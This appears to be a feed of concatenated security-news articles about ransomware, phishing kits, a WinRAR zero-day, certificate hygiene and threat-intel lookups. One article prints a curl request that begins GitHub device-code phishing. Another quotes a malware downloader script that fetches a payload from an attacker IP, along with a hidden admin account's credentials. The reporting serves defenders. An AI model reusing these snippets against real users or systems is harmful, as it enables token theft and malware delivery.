The incident began with what appeared to be a routine security check on a compromised car dealership website. An employee clicked on what seemed like a standard verification prompt to prove they were human.

This single interaction triggered a 42-day compromise that exposed critical vulnerabilities in the company’s security infrastructure and demonstrated how social engineering continues to bypass even enterprise-grade defenses.

The attack leveraged ClickFix, a sophisticated social engineering tactic that disguises malware delivery as legitimate security checks.

When the unsuspecting employee interacted with the fake CAPTCHA, they unknowingly downloaded SectopRAT malware, a .NET-based remote access Trojan (RAT). This malware gave Howling Scorpius their initial foothold into the organization’s network.

Palo Alto Networks security analysts identified that SectopRAT operates in stealth mode, allowing attackers to remotely control infected systems, monitor user activity, steal sensitive data, and execute commands without detection.

The attackers established a command-and-control backdoor on a server and immediately began mapping the virtual infrastructure to plan their next moves.

Infection mechanism

The infection mechanism demonstrated the attackers’ technical sophistication. Over the subsequent 42 days, Howling Scorpius compromised multiple privileged accounts, including domain administrators.

They moved laterally through the network using Remote Desktop Protocol (RDP), Secure Shell (SSH), and Server Message Block (SMB) protocols.

The group accessed domain controllers, staged massive data archives using WinRAR across multiple file shares, and pivoted from one business unit domain into the corporate environment and eventually cloud resources.

Before deploying the Akira ransomware payload, the attackers deleted backup storage containers and exfiltrated nearly one terabyte of data using FileZillaPortable.

They then deployed Akira ransomware across servers in three separate networks, causing virtual machines to go offline and halting operations entirely. The attackers demanded ransom payment.

The incident revealed a critical security gap: while the organization had deployed two enterprise-grade endpoint detection and response (EDR) solutions that logged all malicious activities, these tools generated very few alerts.

Security logs contained complete records of every suspicious connection and lateral movement, but the lack of proper alerting left critical evidence hidden in plain sight.

Palo Alto Networks Unit 42 responded by conducting a comprehensive investigation, reconstructing the complete attack path and negotiating the ransom demand down by approximately 68 percent.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Destructive Akira Ransomware Attack with a Single Click on CAPTCHA in Malicious Website appeared first on Cyber Security News.

The attackers are exploiting Cisco Safe Links technology, designed to protect users from malicious URLs, to evade detection systems and bypass network filters by leveraging the trust associated with Cisco’s security brand.

Key Takeaways
1. Attackers use legitimate Cisco Safe Links to hide malicious URLs, exploiting Cisco's trusted reputation.
2. Security systems trust Cisco domains, allowing malicious wrapped URLs through filters.
3. Context-aware AI detects these attacks through behavioral analysis.

Turning Security Tools into Weapons

According to Raven AI analysis, the attack vector exploits Cisco Safe Links, a component of Cisco’s Secure Email Gateway and Web Security suite that rewrites suspicious URLs in emails, routing clicks through Cisco’s scanning infrastructure at secure-web.cisco[.]com. 

Attackers have discovered multiple methods to generate legitimate Cisco Safe Links for malicious purposes.

The primary techniques include compromising accounts within Cisco-protected organizations to generate Safe Links by emailing themselves malicious URLs, exploiting cloud services that send emails through Cisco-protected environments, and recycling previously generated Safe Links from earlier campaigns. 

When users see URLs beginning with secure-web[.]cisco.com, they instinctively trust the link due to Cisco’s reputation in cybersecurity, creating what researchers term “trust by association.”

The attack bypasses traditional email security gateways because many systems focus their analysis on visible domains in URLs. 

When the domain displays as secure-web.cisco[.]com, it often passes through filters that would otherwise flag suspicious content. 

Additionally, attackers exploit the time gap between when new threats emerge and when Cisco’s threat intelligence systems can identify and classify them as malicious.

Traditional security solutions struggle with these attacks because they appear legitimate at every technical level. 

The malicious elements are hidden in context and behavioral patterns rather than obvious technical indicators. 

Recent examples detected by Raven AI included professional-looking “Document Review Request” emails from purported e-signature services, complete with proper branding and business terminology.

Raven AI’s context-aware artificial intelligence successfully identified these attacks by analyzing multiple signals simultaneously, including inconsistent sender identities, suspicious URL structure with encoded parameters, and document request patterns commonly used in credential phishing. 

The system’s ability to understand legitimate business workflows allows it to identify when communications deviate from expected patterns, even when they appear professionally crafted.

This represents a fundamental shift in cybersecurity threats, where attackers exploit human psychology and business processes rather than just technical vulnerabilities. 

The weaponization of trusted security infrastructure like Cisco Safe Links demonstrates the need for advanced, context-aware detection systems that can identify attacks based on intent and behavioral patterns rather than relying solely on domain reputation and signature-based detection methods.

Safely detonate suspicious files to uncover threats, enrich your investigations, and cut incident response time. Start with an ANYRUN sandbox trial → 

The post Hackers Exploit Cisco Secure Links to Evade Link Scanners and Bypass Network Filters appeared first on Cyber Security News.

Discovered on July 18, 2025, the flaw, now tracked as CVE-2025-8088, is a path traversal vulnerability leveraging alternate data streams (ADS) to hide and deploy malicious files during archive extraction. This allows attackers to silently plant backdoors without alerting users.

ESET researchers have uncovered that the zero-day exploit targeting WinRAR, marking at least the third instance where the RomCom group has weaponized such vulnerabilities in the wild.

Key Takeaways
1. WinRAR vulnerability lets attackers plant malware through malicious archives.
2. Criminals exploit this via phishing to deploy RomCom malware on Windows systems.
3. Update to WinRAR 7.13 immediately.

WinRAR 0-Day Exploited in the Wild

The vulnerability affects WinRAR versions up to 7.12, as well as related components like UnRAR.dll and portable UnRAR source code. ESET promptly notified WinRAR developers on July 24, leading to a patch in version 7.13 beta 1 the same day, with the full release on July 30.

The vulnerability allows threat actors to implement a path traversal attack, where malicious archives contain embedded file paths that override legitimate extraction destinations.

This technique enables attackers to place executable files in sensitive system directories, potentially achieving privilege escalation and persistence mechanisms on compromised systems.

The exploitation methodology involves crafting archives with manipulated directory structures that exploit the file path validation bypass.

When victims extract these archives using vulnerable WinRAR versions, the malware automatically executes without requiring additional user interaction, making it particularly dangerous for unsuspecting users.

Users are urged to update immediately to mitigate risks, especially those relying on integrated UnRAR libraries in other software.

RomCom, also known as Storm-0978 or Tropical Scorpius, has a history of blending cybercrime with espionage. Previously, in June 2023, they exploited CVE-2023-36884 in Microsoft Word documents to target Ukrainian-related entities.

In October 2024, they chained CVE-2024-9680 in Firefox with CVE-2024-49039 in Windows for code execution in browsers like Thunderbird and Tor.

In this campaign, observed from July 18 to 21, 2025, RomCom sent spearphishing emails posing as job applications or CVs to companies in finance, manufacturing, defense, and logistics sectors across Europe and Canada. Attachments, disguised as benign RAR files like “Eli_Rosenfeld_CV2 – Copy (10).rar” or “cv_submission.rar,” appeared to contain innocent documents. 

When users extract files from specially crafted archives, the malicious payload can manipulate the extraction process to place files in unintended system locations, bypassing user-specified destination paths.

Once successfully deployed, the malware establishes command and control communications, enabling threat actors to perform reconnaissance, lateral movement, and data exfiltration activities within compromised networks.

ESET researchers note that this attack vector is particularly effective because compressed archives are commonly shared in business environments, making detection challenging for traditional security solutions that may not thoroughly inspect archive contents before extraction.

Mitigations

WinRAR developers have addressed this critical vulnerability in version 7.13, released on July 30, 2025. 

The security patch fixes the directory traversal flaw that differs from the previous vulnerability addressed in WinRAR 7.12. 

Importantly, Unix versions of RAR, UnRAR, portable UnRAR source code, UnRAR library, and RAR for Android remain unaffected by this Windows-specific vulnerability.

Organizations and individual users must immediately update to WinRAR 7.13 or later versions to mitigate exploitation risks. 

Additional protective measures recommended include scanning compressed files with updated endpoint detection solutions before extraction and restricting archive handling privileges in enterprise environments to minimize potential attack surfaces.

Equip your SOC with full access to the latest threat data from ANY.RUN TI Lookup that can Improve incident response -> Get 14-day Free Trial

The post WinRAR 0-Day in Phishing Attacks to Deploy RomCom Malware appeared first on Cyber Security News.

Certificates are usually forgotten until something breaks. If they expire, get misused, or aren’t monitored, they turn into easy targets for attackers.

A small mistake in handling them can lead to phishing attacks, man-in-the-middle attacks or even silent malware distribution.

Some of the most serious security incidents in the last decade stemmed from certificate mismanagement.

As infrastructure grows more complex, staying on top of certificates is not just an operational problem anymore, but it’s a security priority.

What Does Certificate Mismanagement Look Like?

Certificate mismanagement doesn’t always show up as an obvious failure. Often, it starts with a small test certificate that was never retired or an internal tool using a self-signed cert pushed to production “just for now.”

For example, Users can see confusing errors and your services can go down in case your backend application has no alert trigger mechanism to notify you when your certificate expires.

Teams get desensitized to such issues over time and treat them as warning signs or routine noise rather than critical signals.

Using a self-signed certificate in production is especially risky as they don’t verify the server’s identity and can be easily spoofed by attackers.

Forgotten subdomains or old services with valid X.509 digital certificates are just as dangerous. If attackers find them, they can use them to host phishing sites or malicious redirects without raising much suspicion.

Another problem is the failure to rotate private keys. If a key is reused across services or hasn’t been changed for years, one leak is enough to compromise your entire setup.

This usually happens when there’s no visibility or automation in place. Without a central inventory and with manual processes in play, mistakes are bound to happen.

Common signs of certificate mismanagement:

• Certificates expiring without anyone noticing.
• Use of self-signed certificates in live or external-facing environments.
• Test or internal certificates forgotten but still publicly accessible.
• Weak, reused, or unrotated private keys.
• No centralized inventory or tracking of certificate lifecycle.
• Lack of automation for renewal and revocation processes.

Phishing Attacks Exploit Certificate Gaps

Certificate gaps are increasingly being exploited as phishing techniques become more sophisticated, moving far beyond poorly written emails and suspicious links.

Trust in the browser is being capitalized on by attackers, who know modern users associate it with safety.

Lookalike domains are crafted to mimic legitimate services that are being registered by attackers who then obtain Domain Validation certificates for them.

Since DV certificates only confirm control over a domain and not the legitimacy of the organization, they’re fast and easy to acquire.

As a result, phishing sites appear to have valid HTTPS connections, complete with the reassuring secure sign, tricking users into believing they’re secure.

Valid certificates for abandoned or unused subdomains can quietly create dangerous opportunities for attackers especially when organizations lose track of their certificate inventory across old or test environments.

If these subdomains aren’t properly decommissioned, they can be repurposed to host phishing pages and remain undetected for weeks or even months.

The presence of a valid certificate adds a false sense of security, making detection even harder. Internal tooling is often overlooked as well, where developers rely on self-signed certificates for ease.

This practice leaves internal phishing risks wide open, especially in hybrid or remote setups where employees access these tools from outside the corporate network.

What ties all this together is the user’s implicit trust in anything that appears to be secured by HTTPS.

Attackers understand that most users don’t differentiate between types of certificates or understand what DV, OV, or EV really mean. They simply see a padlock and proceed.

Without certificate visibility, alerting, and lifecycle management in place, organizations unknowingly leave these weak spots exposed, giving attackers just the opportunity they need.

How Certificate Mismanagement Fuels MITM Attacks

Man-in-the-middle or MTM attacks often succeed not because attackers are incredibly sophisticated, but because the basics are ignored. One common issue is expired certificates.

When users see browser warnings too frequently, especially in internal systems, they tend to click through without thinking. Over time, this behavior trains them to ignore real risks.

That one small habit can become an attacker’s biggest advantage.

Impersonation of legitimate services becomes possible when leaked or stolen certificates are left unrevoked or private keys aren’t rotated regularly.

On public Wi-Fi or shared networks, traffic interception becomes easy due to self-signed certificates or mismatches especially across internal tools or VPNs.

Acceptance of outdated or revoked certificates is still common in older systems without proper validation, unknowingly giving attackers a free pass.

These trust gaps are exactly what MITM attacks depend on. And over time, secure connections can be intercepted or impersonated with little effort.

Here’s how Improper certificate management enables MITM attacks:

1. Users get used to expired certs

Users become more vulnerable to real phishing and MITM attacks when they’re regularly exposed to expired certificates in internal tools and get used to ignoring browser warnings.

2. Stolen or unrotated private keys

Impersonation of trusted services and interception of sensitive data become possible if private keys are leaked or reused across systems.

3. Self-signed certificates and mismatches

Internal environments often use self-signed certs or allow hostname mismatches. These are easy for attackers to spoof, especially on public or shared networks like airport Wi-Fi.

4. Unrevoked certificates stay valid

Legacy systems often skip checking certificate revocation lists. Even if a cert is known to be compromised, it still might be trusted.

Real Incidents Caused By Certificate Mismanagement

Security breaches and service outages have often stemmed from overlooked certificate issues, quietly sitting at the center of some of the biggest failures in the past decade.

In the case of Equifax, 76 days of undetected suspicious activity happened due to a single expired certificate on a traffic inspection tool.

A similar incident occurred in 2020, when a global Microsoft Teams outage happened because of expired SSL certificate and it affected millions of users.

No data was compromised, but both cases showed how brittle systems can become when certificates are mismanaged.

Stealthy persistence and the appearance of trusted software have been made possible in major attacks due to poor certificate handling.

In the Stuxnet incident, malware was signed using stolen digital certificates, allowing it to evade detection.

Similarly, in the SolarWinds breach, malicious updates were signed with compromised certificates to maintain long-term access.

In both cases, certificates weren’t just overlooked they were a key part of the attack strategy. These examples show how weak certificate security can turn them into powerful tools for attackers.

Simple Ways To Prevent It

Fixing certificate mismanagement doesn’t require a complete overhaul, but it does take a bit of structure and the right tooling.

1. Maintain a centralized certificate inventory

Blind spots can be avoided and forgotten certificates can be detected if every certificate across environments including staging, internal tools, and old subdomains is properly tracked.

Faster audits and fewer surprises are possible when there’s a single source of truth. While spreadsheets may work in the beginning, automated discovery tools should be used as teams scale.

2. Automate renewals and revocation

Timely renewals and reduced human error can be guaranteed through automation by using the ACME protocol.

The attack surface gets minimized and compliance timelines become easier to meet when compromised certificates can be revoked immediately without depending on manual intervention.

3. Set expiry alerts and rotate keys regularly

Implement alerts well before expiry dates. Rotate private keys periodically and store them securely to limit the blast radius if compromised.

Many organizations overlook old or shared keys that could have leaked. Proactive alerts and rotation policies reduce dependence on human memory and strengthen your crypto hygiene.

4. Monitor Certificate Transparency logs

Watch for rogue certificates issued for your domains. Services like Censys or crt.sh make it easy to keep an eye on the ecosystem.

CT logs help you discover unexpected or suspicious certs, even if issued by a legitimate CA. This early warning system can be the difference between spotting abuse early or not at all.

5. Adopt certificate lifecycle management tools

Streamlined certificate management becomes possible when tools like Venafi TLS Protect, DigiCert TRUST LIFECYCLE Manager, GlobalSign Atlas, or Sectigo SCM Pro are used to handle issuance, renewal and revocation especially in organizations managing hundreds of certificates.

Easier policy enforcement and access control can also be achieved when such tools are in place. They reduce the risk of shadow IT and give security teams real visibility. Over time, they save effort while improving reliability.

Final Thoughts

Certificate issues usually go unnoticed until something breaks or gets exploited. It’s more than a technical issue, it’s an organizational challenge.

When teams treat certificates like a “set it and forget it” task, problems start stacking up. Missed renewals can cause outages, and forgotten subdomains can be turned into phishing sites.

The cost of certificate neglect keeps rising but the upside is that these problems are fixable. With better visibility, automation, and a little upfront effort, teams can stay ahead.

The post How Certificate Mismanagement Opens The Door For Phishing And MITM Attacks appeared first on Cyber Security News.

But if you’re part of a SOC or threat intel team, you don’t have to sit back and wait for alerts.

There’s a faster, more proactive way to uncover and block these attacks before they slip through the cracks. 

The Fastest Way To Uncover Emerging Phishing Campaigns 

Solutions like Threat Intelligence Lookup give you instant access to a massive pool of indicators such as files, URLs, domains, and behaviors, extracted from live analyses of malware and phishing samples performed by analysts across 15,000 companies worldwide inside ANY.RUN’s Interactive Sandbox. 

You can search across fresh IOCs, IOBs, and IOAs, monitor campaigns’ activity, extract artifacts, and feed them directly into your detection stack. 

Let’s take a look at how this works in practice: 

Tycoon2FA: Find Active Phishing Campaigns in the Wild 

Let’s say you want to track real-world sandbox sessions involving Tycoon2FA; phishing kit designed to steal Microsoft credentials and bypass two-factor authentication.

We are specifically interested in how it’s targeting users in Germany, here’s a quick query we can run in Threat Intelligence Lookup: 

threatName:”tycoon” AND submissionCountry:”de” 

Let’s set the search period to the past 3 days (you’ll find that filter right next to the search button). 

Within seconds, Lookup returns sandbox sessions where Tycoon2FA samples were analyzed by users in Germany.

You can explore these analyses to observe the entire attack. Below is a screenshot of one of the sessions found in the results: 

View Tycoon2FA sandbox session  

This kind of visibility helps analysts respond faster and with more confidence, using real-world attack data, not just generic threat signatures. 

You can also download a JSON file with all session links, extracted URLs, and file hashes.

It’s a simple way to gather actionable indicators and enrich your detection rules or block lists before these threats even land in your environment. 

Give your team the intel it needs to catch threats before they become incidents -> Get 50 trial requests in TI Lookup 

EvilProxy: Surface Malicious Domains In Seconds 

EvilProxy is known for abusing legitimate cloud services to host phishing infrastructure, making its campaigns harder to spot using traditional detection methods.

One common tactic involves leveraging Cloudflare Workers to create large numbers of subdomains. 

To track these campaigns, run the following query in Threat Intelligence Lookup: 

domainName:”.workers.dev” AND threatLevel:”malicious” 

This query targets a known pattern in EvilProxy campaigns; abuse of .workers.dev for hosting phishing pages.  

After running the search, go to the Domains tab to see a list of domains extracted from sandbox sessions. Many of these are tied directly to EvilProxy samples: 

Having access to up-to-date infrastructure indicators like these helps your team block threats earlier, refine detection rules, and reduce manual analysis time, especially when those domains are already being used in active attacks. 

Sneaky2FA: Catch Reused Elements Across Campaigns 

While attackers constantly change domains, IPs, and file names to avoid detection, some artifacts tend to stay the same across campaigns involving phishing kits.

These can include things like favicon images, login page templates, JavaScript snippets, or brand assets like logos. 

That’s because assets provided by phishing kits are often reused or only lightly customized between campaigns.

Rebuilding an entire kit takes time, so threat actors frequently copy and paste elements from one target to the next. This consistency gives defenders a small but critical window of opportunity. 

For instance, Sneaky2FA regularly uses spoofed Microsoft 365 login pages, and one of the assets it often includes is the same Microsoft logo.

By searching for the SHA-256 hash of that logo in Threat Intelligence Lookup, you can uncover fresh phishing samples tied to this kit: 

sha256:”5d91563b6acd54468ae282083cf9ee3d2c9b2daa45a8de9cb661c2195b9f6cbf 

Even if the attacker rotates the domain or obfuscates parts of the page, static artifacts like this logo often remain untouched.

That makes them valuable indicators for identifying ongoing campaigns that may otherwise slip through traditional network detection. 

This approach helps you catch phishing activity that’s been dressed up to look new but is really just the same kit underneath. It’s a simple way to stay one step ahead of attackers who reuse what works. 

Strengthen Detection with Real-World Phishing Intelligence 

Phishing kits like Tycoon2FA, EvilProxy, and Sneaky2FA evolve fast but their traces are visible if you know where to look.

With ANY.RUN’s Threat Intelligence Lookup, your team can move from reactive to proactive: uncovering fresh indicators, tracking attacker infrastructure, and identifying reused assets before they hit your environment. 

• Earlier threat detection and faster containment reduce the risk of breaches and limit potential damage 

• Stronger protection based on real-world data improves overall security posture across the organization 

• Faster response times help minimize operational disruption and lower incident-handling costs 

• Higher detection accuracy reduces missed threats and improves SOC efficiency 

Get 50 trial requests in TI Lookup and turn scattered indicators into actionable intel! 

The post Tycoon2FA, EvilProxy, Sneaky2FA: How To Defend Against These Phishing Kit Attacks  appeared first on Cyber Security News.

This emerging threat represents a significant evolution in social engineering tactics, leveraging legitimate GitHub functionality to bypass traditional security measures and gain unauthorized access to source code repositories, CI/CD pipelines, and sensitive intellectual property.

The attack technique mirrors established Azure Active Directory device code phishing methods that have plagued enterprise environments for years, but now targets the developer ecosystem through GitHub’s platform.

Unlike conventional phishing approaches that rely on fraudulent websites or malicious links, these attacks abuse GitHub’s native device code authentication process, making them particularly difficult to detect and block using standard security controls.

Following recent high-profile supply chain attacks including the tj-actions incident, Praetorian analysts noted that GitHub access has become increasingly valuable to threat actors seeking to compromise software development pipelines.

The researchers identified that these device code phishing attacks have achieved success rates exceeding 90% when conducted via phone calls to developers, demonstrating the technique’s effectiveness against even security-conscious targets.

The impact of successful attacks extends far beyond individual account compromises.

Once attackers obtain GitHub OAuth tokens with appropriate scopes, they can exfiltrate proprietary source code, access GitHub Actions secrets for lateral movement, execute malicious code on self-hosted runners, and potentially backdoor critical repositories to launch supply chain attacks affecting thousands of downstream users.

The centralization of development infrastructure around GitHub has made these attacks particularly attractive to threat actors seeking maximum impact from minimal effort.

Attack Mechanism

The GitHub device code phishing process follows a methodical five-step approach that exploits the inherent trust model of OAuth2 device authorization.

The attack begins when threat actors generate device codes through GitHub’s OAuth API, typically requesting broad permissions including user, repository, and workflow scopes.

The following code snippet demonstrates the initial request:-

curl -X POST https://github.com/login/device/code \
  -H "Accept: application/json" \
  -d "client_id=01ab8ac9400c4e429b23&scope=user+repo+workflow"

Attackers often utilize legitimate client IDs such as Visual Studio Code’s identifier (01ab8ac9400c4e429b23) to reduce user suspicion during the authorization process.

The server response includes a device code for token retrieval, a six-digit user code, the verification URL (https://github.com/login/device), and a 15-minute expiration window.

The social engineering phase involves convincing developers to navigate to the verification URL and enter the provided code.

Praetorian researchers have documented various successful pretexts, including impersonating helpdesk personnel claiming device registration updates are required or IT staff conducting security verification procedures.

Once victims complete the authentication flow and authorize the application, attackers retrieve the OAuth token using the original device code.

This token provides persistent access to the victim’s GitHub resources, enabling comprehensive reconnaissance and data exfiltration activities.

The technique’s effectiveness stems from its use of legitimate GitHub functionality, making it nearly impossible to distinguish malicious device code requests from genuine authentication attempts without additional context or behavioral analysis.

Automate threat response with ANY.RUN’s TI Feeds—Enrich alerts and block malicious IPs across all endpoints -> Request full acces

The post New GitHub Device Code Phishing Attacks Targeting Developers to Steal Tokens appeared first on Cyber Security News.

Today, it’s no longer enough to rely on firewalls, antivirus software, or endpoint protection tools. The real vulnerability lies elsewhere: in human behavior.

If you’re running a business today, whether it’s a fast-growing startup or a multinational company, you’ve probably asked yourself: Are my teams prepared to spot and stop a targeted phishing attack? The truth is, most aren’t, and attackers know it.

That’s why every modern organisation should consider implementing a phishing test for company as a core part of their cybersecurity strategy.

Understanding The Real Stakes Of Social Engineering

According to the Verizon 2023 Data Breach Investigations Report, over 80% of breaches involve some form of social engineering phishing, vishing (voice phishing), smishing (SMS phishing), or impersonation.

And among these, phishing remains the easiest and most scalable attack vector.

What makes phishing so effective is not the sophistication of the payload, but the psychological manipulation behind it.

Attackers know how to exploit trust, urgency, authority, or even curiosity to make victims click, reply, or comply.

And with the rise of generative AI and LLMs, phishing is no longer about spotting a poorly written email from a Nigerian prince.

It’s about identifying messages that look, sound, and feel like they came from your CFO, your HR director, or your cloud provider.

What Is A Phishing Test And Why Does It Matter?

A phishing test is a simulated cyberattack that mimics real-world phishing scenarios.

It allows companies to evaluate how employees respond to deceptive emails, voice calls, or text messages without any real risk. Think of it as a fire drill, but for cyber threats.

But not all phishing tests are created equal. Some rely on generic templates and outdated tactics.

Others, like the Conversational Phishing feature recently launched by Arsen, push the boundaries of realism by using AI-generated interactive scenarios.

Instead of a single deceptive email, employees engage in a back-and-forth conversation just like they would with a real attacker trying to build trust and exploit their responses over time.

“Threats evolve. As we train people to identify and mitigate those, we need to evolve as well and provide realistic conditions for testing and training,” explains Thomas Le Coz, CEO of Arsen.

Why Phishing Simulations Make Sense For Businesses

Too often, cybersecurity is seen as the IT department’s problem a technical matter to be handled by specialists, far from the boardroom. But that view is outdated.

Today, the reality is much clearer: social engineering attacks, and phishing in particular, strike at the heart of the business.

They disrupt operations, damage brand reputation, shake customer confidence, and can lead to serious regulatory consequences.

So what can leaders actually do about it ? One lever that’s both actionable and measurable is launching a phishing simulation program and not just to tick a compliance box.

First, it reveals where you’re vulnerable. These simulations help identify who’s likely to fall for a phishing attempt, which types of messages are most convincing, and which teams or roles might need more support.

In other words, it gives you a real-world risk map not just a theoretical one.

Second, it turns passive knowledge into active reflexes. Most people know, in theory, that they shouldn’t click on a suspicious link. But that’s not how habits are built.

Simulations offer a safe, controlled environment where employees can experience realistic threats make mistakes, learn from them, and build the muscle memory they’ll need when a real attack happens.

Third, it shortens your response time. In companies where simulations are part of the routine, employees tend to report suspicious messages faster and more accurately.

That means your security team has more time to react, isolate the issue, and prevent wider damage.

And yes it supports compliance too. Frameworks like GDPR, ISO 27001, or the NIS2 directive increasingly require proof of awareness and preparedness.

Phishing simulations provide exactly that but they also go further. They demonstrate that the company takes human risk seriously and is actively working to reduce it.

In short, phishing simulations aren’t just a training tool they’re a strategic investment in business resilience. And that’s something every leadership team should be paying attention to.

What Makes A Phishing Simulation Truly Effective

Let’s be honest: many companies still rely on generic phishing tests pulled from template libraries the kind of emails that scream “this is a test” from the moment they land in your inbox.

They’re predictable, often poorly timed, and don’t reflect the real tactics used by attackers today.

The result ? Employees either ignore them or spot them instantly, learning nothing in the process. Worse, it creates a false sense of security at the leadership level.

What actually works is something else entirely. First, simulations need to feel real.

That means scenarios anchored in your company’s actual workflows tools your teams use daily, messages that echo your internal tone, even timings that match your business calendar.

A fake HR survey during bonus season? Far more effective than a fake Netflix login alert.

Then, there’s how the interaction unfolds. Modern phishing doesn’t rely on a single email. Attackers build trust across multiple touchpoints.

That’s why simulations should also move beyond “click or don’t click” logic.

When employees find themselves in a back-and-forth exchange like they would with a real scammer they build reflexes that stick.

The level of difficulty should evolve. Your team won’t grow if they’re always handed obvious traps.

As simulations become more subtle or emotionally loaded (a message from a manager, a security alert after hours), you start seeing where the real weaknesses are.

And most importantly, what happens after the click matters. If someone gets tricked, the goal isn’t to shame them.

It’s to teach them immediately, while the moment is fresh. Clear, constructive feedback, sent right after the simulation, turns a mistake into a learning win.

In short: an effective phishing simulation doesn’t try to trick your people — it trains them for what real-world attackers actually do.

Measuring Success: Metrics That Matter

Success isn’t about having zero clicks, that’s unrealistic. It’s about tracking trends and driving improvement over time. Key metrics include:

• Click-through rate (CTR): How many employees engaged with the fake email.
• Reporting rate: How many flagged the email as suspicious.
• Time to report: How quickly the first alert came in.
• Repeat offenders: Who needs targeted follow-up training.

Advanced simulation platforms also allow for departmental comparisons, helping CISOs prioritize awareness initiatives and budget allocation.

What CEOs And CISOs Should Remember

The cost of a phishing-induced breach isn’t just technical, it’s strategic. From ransomware demands and regulatory penalties to customer attrition and press scandals, the consequences are real.

And increasingly, boards and insurers are expecting concrete measures to mitigate this risk.

Phishing simulations are one of the few tools that combine education, testing, behavioral insight, and compliance value in a single program.

They’re not just about catching employees off guard, they’re about preparing them to act decisively when it counts.

The post Phishing Test For Companies: Why Every Business Needs Realistic Simulations To Combat Social Engineering appeared first on Cyber Security News.

Unlike traditional phishing kits that require technical expertise, Haozi offers a streamlined, user-friendly platform that has democratized cybercrime by eliminating the technical barriers typically associated with launching phishing campaigns.

The operation distinguishes itself through its comprehensive service model, providing everything from automated setup procedures to dedicated customer support channels.

Attackers can deploy fully functional phishing infrastructure with minimal effort, requiring only server credentials to initiate the automated installation process.

This plug-and-play approach has attracted thousands of cybercriminals seeking to capitalize on credential theft and financial fraud.

Netcraft researchers identified Haozi administration panels installed across thousands of phishing hostnames, revealing the extensive reach of this criminal enterprise.

The service operates through a subscription-based model, charging approximately $2,000 for annual access, with shorter-term options available at premium pricing.

The operation maintains active Telegram communities for customer support and knowledge sharing, with the current incarnation attracting over 1,700 followers after the original 7,000-member community was shut down.

The phishing service targets multiple attack vectors, including credential harvesting and two-factor authentication bypass mechanisms.

Victims are presented with convincing replicas of legitimate websites, with the stolen data immediately accessible through Haozi’s administrative dashboard.

The platform’s sophisticated filtering capabilities and anti-detection features enable prolonged campaign operation while evading security measures.

Technical Infrastructure and Deployment Mechanism

Haozi’s technical implementation represents a significant evolution in phishing-as-a-service offerings.

The platform features a public-facing web panel that automates the entire deployment process, as demonstrated in Figure 1 showing the ZE-ADMIN installation interface.

Once an attacker inputs server credentials including IP address, port, username, and authentication details, the system remotely connects to the target server and executes the complete installation without requiring command-line interaction.

The administrative interface provides comprehensive campaign management capabilities.

Users can monitor real-time visitor statistics, manage stolen credentials, and configure traffic filtering rules through an intuitive dashboard interface.

The system tracks various metrics including daily visitors, credential submissions, and geographic distribution of victims, enabling operators to optimize their campaigns for maximum effectiveness while maintaining operational security.

Celebrate 9 years of ANY.RUN! Unlock the full power of TI Lookup plan (100/300/600/1,000+ search requests), and your request quota will double.

The post Haozi’s Plug-and-Play Phishing Attack Stolen Over $280,000 From Users appeared first on Cyber Security News.

The campaign, which surfaced on May 15, 2025, employs advanced social engineering techniques disguised as legitimate recruitment opportunities from prestigious financial firm Rothschild & Co to compromise high-value targets across Europe, Africa, Canada, the Middle East, and South Asia.

This multi-stage operation through their email security products, which flagged the suspicious campaign due to unusual CAPTCHA behavior patterns and evasive URL structures.

The attackers demonstrate sophisticated understanding of corporate hierarchies and executive psychology, crafting personalized messages that appeal to career advancement aspirations while bypassing traditional security awareness training focused on generic phishing attempts.

The attack represents a significant departure from conventional malware deployment strategies, as threat actors leverage NetBird, a legitimate WireGuard-based remote access tool, rather than traditional backdoors or trojans.

This approach allows attackers to blend malicious activities with legitimate network management tools, complicating detection efforts and extending persistence capabilities.

Trellix researchers noted that portions of the infrastructure overlap with at least one other nation-state spear-phishing campaign, though definitive attribution remains pending further investigation.

The campaign’s global reach spans multiple industries and geographic regions, with confirmed targeting of financial institutions in the United Kingdom, Canada, South Africa, Norway, South Korea, Singapore, Switzerland, France, Egypt, Saudi Arabia, and Brazil.

The precision targeting suggests extensive reconnaissance capabilities and access to detailed corporate organizational charts, indicating a well-resourced threat actor with strategic objectives beyond immediate financial gain.

Infection Mechanism and Multi-Stage Payload Delivery

The attack chain initiates with carefully crafted emails bearing the subject line “Rothschild & Co leadership opportunity (Confidential)” sent from the address _863563754768397286998728@notarius.net.

Recipients receive what appears to be a PDF attachment named “Rothschild_&_Co-6745763.PDF,” which actually functions as a phishing link redirecting victims to a Firebase-hosted application at hxxps://googl-6c11f.firebaseapp[.]com/job/file-846873865383.html.

The intermediate page implements a custom CAPTCHA mechanism requiring users to solve simple mathematical calculations, specifically asking “What is the result of 9 + 10?” This evasion technique circumvents automated security scanners while creating a false sense of legitimacy through the mathematical verification process.

Upon successful completion, JavaScript functions decrypt a hardcoded redirect URL, leading victims to hxxps://googl-6c11f.web[.]app/job/9867648797586_Scan_15052025-736574.html, where they encounter a download portal mimicking secure document delivery systems.

The downloaded archive “Rothschild_&_Co-6745763.zip” contains an initial VBS script that establishes the infection foothold. This 1KB file performs several critical functions upon execution:-

scriptURL = "http://192.3.95.152/cloudshare/atr/pull.pdf"
savePath = "C:\temper\pull.vbs"
Set objFSO = CreateObject("Scripting.FileSystemObject")
If Not objFSO.FolderExists("C:\temper") Then
    objFSO.CreateFolder "C:\temper"
End If

The script establishes a temporary directory structure, downloads a secondary payload disguised as a PDF file, and executes it with elevated privileges using the “runas” flag.

This second-stage VBS downloader retrieves additional components from the same command and control server, including NetBird and OpenSSH MSI packages concealed within a renamed ZIP archive.

The installation process occurs silently through msiexec commands, while the script simultaneously creates a hidden administrative account named “user” with the password “Bs@202122” and enables Remote Desktop Protocol access, providing attackers with multiple persistent access vectors to compromised systems.

Celebrate 9 years of ANY.RUN! Unlock the full power of TI Lookup plan (100/300/600/1,000+ search requests), and your request quota will double.

The post New Spear-Phishing Attack Targeting Financial Executives by Deploying NetBird Malware appeared first on Cyber Security News.

From sophisticated phishing schemes targeting your team’s trust to ransomware that can lock down critical systems in seconds, these digital predators constantly search for ways into your infrastructure.

Understanding today’s cyber threats isn’t just about protecting data it’s about ensuring your organization’s survival.

The Digital Shadows: Threats Hiding In Plain Sight

Dangerous threats often operate invisibly, waiting for an opportunity to strike. Your business infrastructure faces constant probing from attackers looking to exploit vulnerabilities.

Without proper detection systems, these digital shadows can compromise operations before you notice their presence.

Cybersecurity isn’t just about prevention it’s about protecting your ability to operate freely.

